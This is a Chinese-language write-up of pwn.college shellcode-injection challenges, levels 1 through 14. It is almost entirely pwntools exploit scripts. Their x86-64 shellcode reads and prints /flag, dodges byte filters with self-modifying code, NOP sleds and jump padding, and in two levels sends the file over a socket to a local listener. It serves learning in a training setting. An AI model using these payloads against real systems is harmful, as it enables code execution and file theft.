shellcodeORW

Posted on 2024-03-05

# PREFACE: pwn.college 的 shellcode injection，算是一个小入门～

# level 1

basic orw：

	from pwn import *
	from string import *
	# context.syntax = 'intel'
	context(os='linux',arch='amd64',log_level='debug',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()
	# print(flag_file)

	shellcode = f'''
	// close:
	mov rdi, 2
	mov rax, 3
	syscall

	// open:
	mov rbx, 0x{flag_file}
	mov rsi, 0
	mov rdx, 0
	push rbx
	push rsp
	pop rdi
	mov rax, 2
	syscall

	// read:
	mov rdi, rax
	mov rsi, rsp
	mov rdx, 0x50
	xor rax, rax
	syscall

	// write:
	mov rdx, rax
	mov rdi, 1
	mov rsi, rsp
	mov rax, 1
	syscall

	// exit:
	mov rax, 0x3c
	syscall
	'''
	hex_shellcode = asm(shellcode)
	# print(hex_shellcode)
	p = gdb.debug('./level1_chall','b main + 560\nb main + 709')
	p.sendafter('Reading 0x1000 bytes from stdin.\n',hex_shellcode + b'\n')
	# p.send(hex_shellcode + b'\n')
	p.interactive()

# level 2

随机跳一段，全 nop 即可

	from pwn import *
	from string import *
	# context.syntax = 'intel'
	context(os='linux',arch='amd64',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()
	# print(flag_file)

	shellcode = f'''
	// close:
	mov rdi, 2
	mov rax, 3
	syscall

	// open:
	mov rbx, 0x{flag_file}
	mov rsi, 0
	mov rdx, 0
	push rbx
	push rsp
	pop rdi
	mov rax, 2
	syscall

	// read:
	mov rdi, rax
	mov rsi, rsp
	mov rdx, 0x50
	xor rax, rax
	syscall

	// write:
	mov rdx, rax
	mov rdi, 1
	mov rsi, rsp
	mov rax, 1
	syscall

	// exit:
	mov rax, 0x3c
	syscall
	'''
	hex_shellcode = asm(shellcode)
	# print(hex_shellcode)
	p = gdb.debug('./level2_chall','b *main + 910')
	# while (True):
	# p = process('./level2_chall')
	# p.sendafter('Reading 0x1000 bytes from stdin.\n',0x700 * b'\90' + hex_shellcode + b'\n')
	# # p.send(hex_shellcode + b'\n')
	# print(p.recv())
	# if (b'flag' in p.recv()):
	# print(p.recv())
	# break
	# p.close()
	p.sendafter('Reading 0x1000 bytes from stdin.\n',0x700 * b'\x90' + hex_shellcode + b'\n')
	p.interactive()

# level 3

禁用 \x00

	from pwn import *
	from string import *
	# context.syntax = 'intel'
	context(os='linux',arch='amd64',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()
	# print(flag_file)

	shellcode = f'''
	// close:
	xor rdx, rdx
	xor rdi, rdi
	xor rax, rax
	mov dil, 2
	mov al, 3
	syscall

	// open:
	xor rsi, rsi
	xor rdx, rdx
	sub rsp, 5
	mov byte ptr [rsp], 0x2f
	mov byte ptr [rsp+1], 0x66
	mov byte ptr [rsp+2], 0x6c
	mov byte ptr [rsp+3], 0x61
	mov byte ptr [rsp+4], 0x67
	mov byte ptr [rsp+5], 0x01
	sub byte ptr [rsp+5], 0x01
	push rsp
	pop rdi
	mov al, 2
	syscall

	// read:
	mov rdi, rax
	mov rsi, rsp
	mov dl, 0x50
	xor rax, rax
	syscall

	// write:
	mov rdx, rax
	mov al, 1
	push rax
	pop rdi
	mov rsi, rsp
	mov al, 1
	syscall
	// exit:
	mov al, 0x3c
	syscall
	'''
	hex_shellcode = asm(shellcode)
	# print(hex_shellcode)
	p = gdb.debug('./level2_chall','b *main + 910')
	# while (True):
	# p = process('./level2_chall')
	# p.sendafter('Reading 0x1000 bytes from stdin.\n',0x700 * b'\90' + hex_shellcode + b'\n')
	# # p.send(hex_shellcode + b'\n')
	# print(p.recv())
	# if (b'flag' in p.recv()):
	# print(p.recv())
	# break
	# p.close()
	p.sendafter('Reading 0x1000 bytes from stdin.\n',0x700 * b'\x90' + hex_shellcode + b'\n')
	p.interactive()

# level 4

ban ‘H’，不能用 xor 和 mov 等，用 push pop 代替赋值即可

	from pwn import *
	from string import *
	# context.syntax = 'intel'
	context(os='linux',arch='amd64',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()
	# print(flag_file)

	shellcode = f'''
	// close:
	push 0
	pop rdx
	push 0
	pop rdi
	push 0
	pop rdx
	mov dil, 2
	mov al, 3
	syscall
	nop

	// open:
	push 0
	pop rsi
	push 0
	pop rdx
	nop
	push 0
	push 0
	push 0
	push 0
	push 0
	nop
	mov byte ptr [rsp], 0x2f
	mov byte ptr [rsp+1], 0x66
	mov byte ptr [rsp+2], 0x6c
	mov byte ptr [rsp+3], 0x61
	mov byte ptr [rsp+4], 0x67
	mov byte ptr [rsp+5], 0x01
	sub byte ptr [rsp+5], 0x01
	push rsp
	pop rdi
	mov al, 2
	syscall
	nop
	// read:
	push rax
	pop rdi
	push rsp
	pop rsi
	mov dl, 0x50
	push 0
	pop rax
	syscall
	nop
	// write:
	push rax
	pop rdx
	mov al, 1
	push rax
	pop rdi
	push rsp
	pop rsi
	mov al, 1
	syscall
	// exit:
	mov al, 0x3c
	syscall
	'''
	hex_shellcode = asm(shellcode)
	# print(hex_shellcode)
	# p = gdb.debug('./level2_chall','b *main + 910')
	p = process('/challenge/babyshell_level4')
	# while (True):
	# p = process('./level2_chall')
	# p.sendafter('Reading 0x1000 bytes from stdin.\n',0x700 * b'\90' + hex_shellcode + b'\n')
	# # p.send(hex_shellcode + b'\n')
	# print(p.recv())
	# if (b'flag' in p.recv()):
	# print(p.recv())
	# break
	# p.close()
	p.sendafter('Reading 0x1000 bytes from stdin.\n',0x700 * b'\x90' + hex_shellcode + b'\n')
	p.interactive()
	# p.recv()

# level 5

ban syscall 等，得 smc 拿（代码写复杂了，可以直接获取 rip 的，不过一时没想起来就用了他的 leak 来找地址）

	from pwn import *
	from string import *
	context(os='linux',arch='amd64',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()

	# p = gdb.debug('./level5_chall','b main\nb main + 873')
	p = process('./level5_chall')
	p.recvuntil('[LEAK] Mapping shellcode memory at ')
	leak_addr = p.recvn(10).decode()
	leak_addr = int(leak_addr, 16)

	# close
	shellcode = b''
	shellcode_close = '''
	xor rdi, rdi
	xor rdx, rdx
	xor rax, rax
	xor rsi,rsi
	mov dil, 2
	mov al, 3
	'''
	shellcode_close = asm(shellcode_close)
	shellcode += shellcode_close
	syscall = '''
	syscall
	'''
	syscall = asm(syscall)
	after_syscall = bytes(a ^ b for a,b in zip(b'\x90\x90', syscall))
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)

	# open
	shellcode_open = '''
	mov al, 2
	xor rdx, rdx
	xor rsi, rsi
	mov rbx, 0x0067616c662f
	push rbx
	push rsp
	pop rdi
	'''
	shellcode_open = asm(shellcode_open)
	shellcode += shellcode_open
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)

	# read
	shellcode_read = '''
	mov rdi, rax
	mov rsi, rsp
	mov rdx, 0x100
	mov al, 0
	'''
	shellcode_read = asm(shellcode_read)
	shellcode += shellcode_read
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)

	# write
	shellcode_write = '''
	mov rdi, 1
	mov rsi, rsp
	mov rdx, rax
	mov al, 1
	'''
	shellcode_write = asm(shellcode_write)
	shellcode += shellcode_write
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)

	shellcode_exit = '''
	mov rax, 60
	'''
	shellcode_exit = asm(shellcode_exit)
	shellcode += shellcode_exit
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)
	# print('--------------------------------------')
	# print(disasm(shellcode))
	# print('--------------------------------------')
	p.sendafter('Reading 0x1000 bytes from stdin.\n',shellcode + b'\n')
	p.interactive()

# level 6

比起上一题多了禁用前 0x1000 的 write，不过长度够可以直接绕

.rept 0x1000
	nop
.endr

	from pwn import *
	from string import *
	context(os='linux',arch='amd64',terminal=['tmux','splitw','-h'],log_level='debug')
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()

	p = gdb.debug('./level6_chall','b main\nb main + 957\nb *main + 525')
	# p = process('./level6_chall')
	p.recvuntil('[LEAK] Mapping shellcode memory at ')
	leak_addr = p.recvn(10).decode()
	leak_addr = int(leak_addr, 16)

	# close
	shellcode = '''
	.rept 0x1000
	nop
	.endr
	'''
	shellcode = asm(shellcode)
	shellcode_close = '''
	xor rdi, rdi
	xor rdx, rdx
	xor rax, rax
	xor rsi,rsi
	mov dil, 2
	mov al, 3
	'''
	shellcode_close = asm(shellcode_close)
	shellcode += shellcode_close
	syscall = '''
	syscall
	'''
	syscall = asm(syscall)
	after_syscall = bytes(a ^ b for a,b in zip(b'\x90\x90', syscall))
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)

	# open
	shellcode_open = '''
	mov al, 2
	xor rdx, rdx
	xor rsi, rsi
	mov rbx, 0x0067616c662f
	push rbx
	push rsp
	pop rdi
	'''
	shellcode_open = asm(shellcode_open)
	shellcode += shellcode_open
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)

	# read
	shellcode_read = '''
	mov rdi, rax
	mov rsi, rsp
	mov rdx, 0x100
	mov al, 0
	'''
	shellcode_read = asm(shellcode_read)
	shellcode += shellcode_read
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)

	# write
	shellcode_write = '''
	mov rdi, 1
	mov rsi, rsp
	mov rdx, rax
	mov al, 1
	'''
	shellcode_write = asm(shellcode_write)
	shellcode += shellcode_write
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)

	shellcode_exit = '''
	mov rax, 60
	'''
	shellcode_exit = asm(shellcode_exit)
	shellcode += shellcode_exit
	syscall = f'''
	mov rbx, {leak_addr + len(shellcode) + 14}
	xor byte ptr [rbx], {after_syscall[0]}
	xor byte ptr [rbx+1], {after_syscall[1]}
	nop
	nop
	'''
	shellcode += asm(syscall)
	p.sendafter('Reading 0x2000 bytes from stdin.\n',shellcode + b'\n')
	# h = p.recv(0x2000)
	# print(h)
	p.interactive()

# level 7

ban stdin stdout stderr，这里用 socket 来传

开 server 接：

	import socket

	def start_server(host='0.0.0.0', port=5678):
	while(True):
	server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	server_socket.bind((host, port))

	server_socket.listen(5)
	print(f"Listening on {host}:{port}...")

	client_socket, addr = server_socket.accept()
	print(f"Accepted a connection from {addr}")

	data = client_socket.recv(1024)
	print("Received data:", data.decode())

	client_socket.close()
	server_socket.close()

	if __name__ == "__main__":
	start_server()

exp:

	from pwn import *
	from string import *
	context(os='linux',arch='amd64',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()

	# p = gdb.debug('./level6_chall','b main\nb main + 957\nb *main + 525')
	p = process('/challenge/babyshell_level7')
	p.recvuntil('Mapped 0x4000 bytes for shellcode at ')
	leak_addr = p.recvn(10).decode()
	leak_addr = int(leak_addr, 16)
	shellcode = '''
	// socket:
	mov rdi, 2
	mov rsi, 1
	xor rdx, rdx
	mov rax, 41
	syscall

	mov rdi, rax
	mov r9, rax

	// socket addr preparation
	sub rsp, 4
	mov word ptr [rsp + 0], 2
	mov word ptr [rsp + 2], 0x2e16
	mov dword ptr [rsp + 4], 0x0100007f

	push rsp
	pop rsi

	// connect
	mov rdx, 16
	mov rax, 42
	syscall

	// mov rcx, rax // socket descriptor
	mov rcx, rdi

	// close:
	mov rdi, 2
	mov rax, 3
	syscall

	// open:
	mov rbx, 0x0067616c662f
	mov rsi, 0
	mov rdx, 0
	push rbx
	push rsp
	pop rdi
	mov rax, 2
	syscall

	// read:
	mov rdi, rax
	mov rsi, rsp
	mov rdx, 0x50
	xor rax, rax
	syscall


	// write:
	mov rdx, rax
	xor rdi, rdi
	mov rdi, r9
	mov rsi, rsp
	mov rax, 1
	syscall

	mov rdi, rax
	mov rax, 3
	syscall

	// exit
	mov rax, 59
	syscall
	'''
	shellcode = asm(shellcode)
	p.sendafter('Reading 0x4000 bytes from stdin.\n',shellcode + b'\n')
	# h = p.recv(0x2000)
	# print(h)
	p.interactive()

# level 8

0x12 bytes，用的是 chmod (‘file’,7)， ln -s /flag f 软链接到 f 上来节约字符

.intel_syntax noprefix
.text
.globl _start
_start:
    mov al, 0x5a
    mov sil, 7
    push 0x66     
    push rsp
    pop rdi
    syscall

cat flag

# level 9

每十个会 CC 十个，那么写一个生成 shellcode，使得超过 10 个的时候会加入一个 jmp（注意不能用 qword mov 这种大于等于八字节的指令，算是这题隐性的 ban list）：

	from pwn import *
	from string import *
	from random import *
	context(os='linux',arch='amd64')
	shellcode = f''' mov rdi, 2
	mov rax, 3
	syscall
	xor rsi, rsi
	xor rdx, rdx
	sub rsp, 5
	mov byte ptr [rsp], 0x2f
	mov byte ptr [rsp+1], 0x66
	mov byte ptr [rsp+2], 0x6c
	mov byte ptr [rsp+3], 0x61
	mov byte ptr [rsp+4], 0x67
	mov byte ptr [rsp+5], 0x01
	sub byte ptr [rsp+5], 0x01
	push rsp
	pop rdi
	mov al, 2
	syscall
	mov rdi, rax
	mov rsi, rsp
	mov rdx, 0x50
	xor rax, rax
	syscall
	mov rdx, rax
	mov dil, 1
	mov rsi, rsp
	mov al, 1
	syscall
	mov rax, 0x3c
	syscall'''
	shellcode_list = shellcode.splitlines()
	# print(shellcode_list)
	shellcode_tmp = ''
	shellcode_len = 0
	shellcode_pad_flag = 0
	i = 0
	while (i < len(shellcode_list)):
	# print(f'shellcode_tmp [{i}]: \n',shellcode_tmp)
	if ((shellcode_len // 10) % 2 == 0 and shellcode_pad_flag == 1):
	if (shellcode_len % 10 <= 8):
	random_str = ''.join(choices(string.ascii_letters, k=4))
	pad = -(shellcode_len % 10) + 8 + 10
	shellcode_tmp += f" jmp {random_str}\n .rept {pad}\n nop\n .endr\n{random_str}:\n"
	shellcode_len += pad + 2
	shellcode_pad_flag = 0
	else:
	shellcode_pad_flag = 1
	shellcode_len -= len(asm(shellcode_list[i - 1]))
	tmp = shellcode_tmp.splitlines()
	tmp = tmp[:-1]
	shellcode_tmp = '\n'.join(tmp)
	shellcode_tmp += '\n'
	i -= 1

	elif ((shellcode_len // 10) % 2 == 0 and shellcode_pad_flag == 0):
	shellcode_tmp += shellcode_list[i] + '\n'
	shellcode_len += len(asm(shellcode_list[i]))
	i += 1

	elif ((shellcode_len // 10) % 2 == 1):
	shellcode_len -= len(asm(shellcode_list[i - 1]))
	tmp = shellcode_tmp.splitlines()
	tmp = tmp[:-1]
	shellcode_tmp = '\n'.join(tmp)
	shellcode_tmp += '\n'
	i -= 1
	shellcode_pad_flag = 1


	print(shellcode_tmp)

生成的 exp

	from pwn import *
	from string import *
	from random import *
	# context.syntax = 'intel'
	context(os='linux',arch='amd64',log_level='debug',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()
	# print(flag_file)

	shellcode = f''' mov rdi, 2
	jmp EIBi
	.rept 11
	nop
	.endr
	EIBi:
	mov rax, 3
	jmp wIoJ
	.rept 11
	nop
	.endr
	wIoJ:
	syscall
	xor rsi, rsi
	xor rdx, rdx
	jmp GGxU
	.rept 10
	nop
	.endr
	GGxU:
	sub rsp, 5
	mov byte ptr [rsp], 0x2f
	jmp HIQh
	.rept 10
	nop
	.endr
	HIQh:
	mov byte ptr [rsp+1], 0x66
	jmp hAbJ
	.rept 13
	nop
	.endr
	hAbJ:
	mov byte ptr [rsp+2], 0x6c
	jmp bxUa
	.rept 13
	nop
	.endr
	bxUa:
	mov byte ptr [rsp+3], 0x61
	jmp JNPB
	.rept 13
	nop
	.endr
	JNPB:
	mov byte ptr [rsp+4], 0x67
	jmp GoxX
	.rept 13
	nop
	.endr
	GoxX:
	mov byte ptr [rsp+5], 0x01
	jmp xzHp
	.rept 13
	nop
	.endr
	xzHp:
	sub byte ptr [rsp+5], 0x01
	push rsp
	pop rdi
	jmp UTod
	.rept 11
	nop
	.endr
	UTod:
	mov al, 2
	syscall
	mov rdi, rax
	jmp Imgn
	.rept 11
	nop
	.endr
	Imgn:
	mov rsi, rsp
	jmp EDoc
	.rept 15
	nop
	.endr
	EDoc:
	mov rdx, 0x50
	jmp qLZG
	.rept 11
	nop
	.endr
	qLZG:
	xor rax, rax
	syscall
	mov rdx, rax
	jmp AbtY
	.rept 10
	nop
	.endr
	AbtY:
	mov dil, 1
	mov rsi, rsp
	mov al, 1
	jmp UuTH
	.rept 10
	nop
	.endr
	UuTH:
	syscall
	mov rax, 0x3c
	syscall'''

	hex_shellcode = asm(shellcode)
	print(hex_shellcode)
	p = gdb.debug('./level9_chall_cp','b main\nb main + 912')
	# p = process('./level9_chall_cp')
	p.sendafter('Reading 0x1000 bytes from stdin.\n',hex_shellcode + b'\n')
	# p.send(hex_shellcode + b'\n')
	p.interactive()

# level 10

要求从小到大，可以开始查一些单字节双字节指令插进去（这题用的多的是 nop）

	from pwn import *
	from string import *
	from random import *
	# context.syntax = 'intel'
	context(os='linux',arch='amd64',log_level='debug',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()
	# print(flag_file)

	shellcode = f'''
	// open
	mov rbx, 0x67616c662f
	nop
	xor rsi, rsi
	xor rdx, rdx
	mov al, 2
	push rbx
	push rsp
	nop
	nop
	pop rdi
	syscall
	nop

	// read
	mov rdi, rax
	mov rsi, rsp
	nop
	nop
	nop
	nop
	mov dl, 0x50
	nop
	xor rax, rax

	syscall

	// write
	nop
	nop
	nop
	mov dil, 1
	nop
	nop
	nop
	nop
	nop
	nop
	mov rsi, rsp
	mov rdx, rax
	mov al, 1
	syscall
	nop
	nop
	inc rax
	'''

	hex_shellcode = asm(shellcode)
	print(hex_shellcode)
	# p = gdb.debug('./level9_chall_cp','b main\nb main + 912')
	p = process('./level10_chall')
	p.sendafter('Reading 0x1000 bytes from stdin.\n',hex_shellcode + b'\n')
	# p.send(hex_shellcode + b'\n')
	p.interactive()

# level 11

用的 socket，和上题一样但是长很多所以调整更多

	from pwn import *
	from string import *
	from random import *
	# context.syntax = 'intel'
	context(os='linux',arch='amd64',log_level='debug',terminal=['tmux','splitw','-h'])
	flag_file = '/flag'
	flag_file = flag_file[::-1]
	flag_file = flag_file.encode().hex()
	# print(flag_file)

	shellcode = f'''
	// socket:
	xor rdi, rdi
	xor rsi, rsi
	xor rax, rax
	mov dil, 2
	mov sil, 1
	xor rdx, rdx
	mov al, 41
	syscall

	nop
	mov rdi, rax
	nop
	nop
	nop
	nop
	nop
	mov r9, rax

	// socket addr preparation
	nop
	sub rsp, 4
	mov word ptr [rsp + 0], 2
	nop
	nop
	mov word ptr [rsp + 2], 0x2e16
	nop
	nop
	mov word ptr [rsp + 4], 0x007f
	xchg eax, ecx
	mov word ptr [rsp + 6], 0x0100
	xchg eax, ecx

	push rsp
	pop rsi

	// connect
	mov dl, 16
	mov al, 42
	xchg eax, ecx
	xchg ecx, eax
	syscall

	mov rcx, rdi
	nop
	xchg eax, ecx
	xchg ecx, eax

	// open:
	xor rsi, rsi
	xor rdx, rdx
	xchg eax, ecx
	xchg eax, ecx
	sub rsp, 5
	xchg eax, ecx
	xchg eax, ecx
	xchg eax, edx
	xchg eax, edx
	mov byte ptr [rsp], 0x2f
	xchg eax, edx
	xchg eax, edx
	xchg eax, edx
	xchg eax, edx
	mov byte ptr [rsp+1], 0x66
	nop
	xchg eax, ebx
	xchg eax, ebx
	mov byte ptr [rsp+2], 0x6c
	nop
	xchg eax, ebx
	xchg eax, ebx
	mov byte ptr [rsp+3], 0x61
	nop
	xchg eax, ebp
	xchg eax, ebp
	mov byte ptr [rsp+4], 0x67
	nop
	xchg eax, ebp
	xchg eax, ebp
	mov byte ptr [rsp+5], 0x00
	nop
	xchg eax, esi
	xchg eax, esi
	push rsp
	pop rdi
	mov al, 2
	syscall
	xchg eax, edi
	xchg eax, edi

	// read:
	mov rdi, rax
	mov rsi, rsp
	xchg eax, edi
	xchg eax, edi
	mov dl, 0x50
	nop
	nop
	xor rax, rax
	xchg eax, edi
	xchg eax, edi
	syscall


	// write:
	mov rdx, rax
	test eax, eax
	xor rdi, rdi
	mov rdi, r9
	test eax, eax
	mov rsi, rsp
	mov al, 0
	inc rax
	syscall

	mov rdi, rax
	inc rax
	mov al, 3

	syscall
	nop
	inc rax
	'''

	hex_shellcode = asm(shellcode)
	# p = gdb.debug('./level9_chall_cp','b main\nb main + 912')
	p = process('./level10_chall')
	p.sendafter('Reading 0x1000 bytes from stdin.\n',hex_shellcode + b'\n')
	# p.send(hex_shellcode + b'\n')
	p.interactive()

# level 12

不能重复，这里就用 chmod 那个打法

	from pwn import *
	context(os='linux',arch='amd64')
	shellcode = '''
	mov al, 0x5a
	mov sil, 7
	push 0x66
	// f
	push rsp
	pop rdi
	syscall
	'''
	p = process('/challenge/babyshell_level13')
	p.sendafter('Reading 0x1000 bytes from stdin.\n',asm(shellcode))
	p.interactive()

# level 13

前面的 exp 可以打通，这里不是很理解为什么没有 write 还可以 push 和 pop

	from pwn import *
	context(os='linux',arch='amd64')
	shellcode = '''
	mov al, 0x5a
	mov sil, 7
	push 0x66
	// f
	push rsp
	pop rdi
	syscall
	'''
	p = process('/challenge/babyshell_level13')
	p.sendafter('Reading 0x1000 bytes from stdin.\n',asm(shellcode))
	p.interactive()
	# 即使栈没有写权限，还是可以 push 和 pop

# level 14

6 字节，这里只能 read，调试利用已有的寄存器， fd = 1 即可接着写入 shellcode

	from pwn import *
	context(os='linux',arch='amd64', terminal=['tmux','splitw','-h'],log_level='debug')
	shellcode = '''
	xor edi, edi
	mov esi, edx
	syscall
	'''
	# p = process('/challenge/babyshell_level14')
	# p = gdb.debug('/challenge/babyshell_level14','b *main + 634')
	p = gdb.debug('./level14_chall','b* main + 674')
	p.sendafter('Reading 0x6 bytes from stdin.\n',asm(shellcode))
	shellcode = '''
	// open
	nop
	nop
	nop
	nop
	nop
	nop
	nop
	nop
	mov rbx, 0x0067616c662f
	mov rsi, 0
	mov rdx, 0
	mov al, 2
	push rbx
	push rsp
	pop rdi
	syscall

	// read
	mov rdi, rax
	mov rsi, rsp
	mov rdx, 0x50
	mov rax, 0
	syscall

	// write
	mov rdi, 1
	mov rsi, rsp
	mov rdx, rax
	mov rax, 1
	syscall
	'''
	p.send(asm(shellcode))
	p.interactive()